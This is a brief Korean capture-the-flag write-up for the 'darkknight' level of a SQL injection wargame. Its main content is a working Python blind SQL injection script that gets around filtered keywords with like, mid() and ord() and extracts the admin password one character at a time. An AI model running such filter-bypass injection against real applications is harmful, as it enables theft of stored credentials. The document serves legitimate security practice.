LOS - darkknight

substr ascii = ' 가 필터링 되어 있다.

 

또 쿼리가 pw, no 두 개의 값을 받게 되어 있다.

 

mid() ord() like " 를 사용해서 코드를 짜면

import requests

url = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'

php = '세션값'

pl=0

password = ''

for i in range(1,50):

    r = requests.get(url, params={'pw':f'','no':f'1 or id like "admin" and length(pw) like {i};-- -'}, cookies={'PHPSESSID':php})

    if 'Hello admin' in r.text:

        print(i)

        pl = i

        break

for i in range(1,pl+1):

    for j in range(32,127):

        r = requests.get(url, params={'pw':f'','no':f'1 or id like "admin" and ord(mid(pw,{i},1)) like {j};-- -'}, cookies={'PHPSESSID':php})

        if 'Hello admin' in r.text:

            password += chr(j)

            break

print(password)

풀었다!